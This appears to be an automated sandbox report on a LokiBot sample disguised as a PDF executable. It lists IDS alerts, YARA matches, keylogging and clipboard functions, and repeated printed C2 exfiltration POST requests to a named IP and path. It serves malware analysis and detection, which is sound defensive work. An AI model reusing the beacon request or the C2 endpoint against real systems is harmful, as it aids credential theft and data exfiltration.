Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49782 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49782
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49783 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49783 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49783 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49783 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49783
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49784 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49784 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49784 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49784 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49784
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49785 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49785 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49785 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49785 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49785
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49786 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49786 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49786 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49786 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49786
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49787 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49787 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49787 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49787 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49787
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49788 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49788 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49788 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49788 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49788
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49789 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49789 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49789 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49789 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49789
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49790 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49790 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49790 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49790 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49790
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49791 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49791 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49791 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49791 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49791
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 176Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 176Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 149Connection: close
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Source: unknownTCP traffic detected without corresponding DNS query: 108.170.31.41
Contains functionality to download additional files from the internetShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F52404 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,2_2_00F52404
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /dozlogs/logs/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 108.170.31.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 77A6CCB6Content-Length: 176Connection: close
Urls found in memory or binary dataShow sources
Source: scan0098788_pdf.exe, 00000000.00000002.816530899.0000000006AFF000.00000040.00000001.sdmp, scan0098788_pdf.exe, 00000003.00000002.1171632363.0000000000590000.00000004.00000020.sdmpString found in binary or memory: http://108.170.31.41/dozlogs/logs/fre.php
Source: scan0098788_pdf.exe, scan0098788_pdf.exe, 00000003.00000002.1171230305.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboardShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F5407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_00F5407C
Contains functionality to read the clipboard dataShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F5407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_00F5407C
Contains functionality to retrieve information about pressed keystrokesShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00EE2344 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00EE2344
Potential key logger detected (key state polling based)Show sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00F6CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F6CB26
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F6CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00F6CB26

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000000.00000003.790188914.0000000005591000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.807797640.00000000057D7000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.787230238.00000000060B4000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.785230005.00000000055F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.785335673.000000000568C000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.757905408.00000000057D7000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1171230305.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1171230305.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
Source: 00000000.00000003.791806641.00000000060B4000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.757815096.000000000568C000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.785273546.000000000562C000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.787472385.00000000060B4000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.789332429.00000000060B4000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.791179991.00000000060B4000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.789421483.00000000060B4000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.816455062.0000000006A60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.816455062.0000000006A60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
Source: 0.2.scan0098788_pdf.exe.6a60000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.scan0098788_pdf.exe.6a60000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
Source: 3.2.scan0098788_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.scan0098788_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
Source: 3.2.scan0098788_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.scan0098788_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
Source: 0.2.scan0098788_pdf.exe.6a60000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.scan0098788_pdf.exe.6a60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
Binary is likely a compiled AutoIt script fileShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: This is a third-party compiled AutoIt script.0_2_00EE3B4C
Source: scan0098788_pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.
